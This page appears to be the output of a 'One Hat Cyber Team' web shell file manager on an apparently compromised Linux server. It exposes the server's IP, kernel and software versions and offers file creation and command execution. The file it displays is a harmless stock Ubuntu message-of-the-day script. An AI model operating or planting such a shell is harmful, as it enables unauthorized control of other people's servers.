One Hat Cyber Team
Your IP :
3.16.83.64
Server IP :
104.21.112.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
etc
/
update-motd.d
/
View File Name :
95-hwe-eol
#!/bin/sh # this stamp is created and updated by /usr/lib/update-notifier/update-motd-hwe-eol stamp="/var/lib/update-notifier/hwe-eol" # do not try to refresh this more than once per day [ -z "$(find "$stamp" -newermt 'now-1 days' 2> /dev/null)" ] && exit 0 if [ -x /usr/lib/update-notifier/update-motd-hwe-eol ]; then exec /usr/lib/update-notifier/update-motd-hwe-eol fi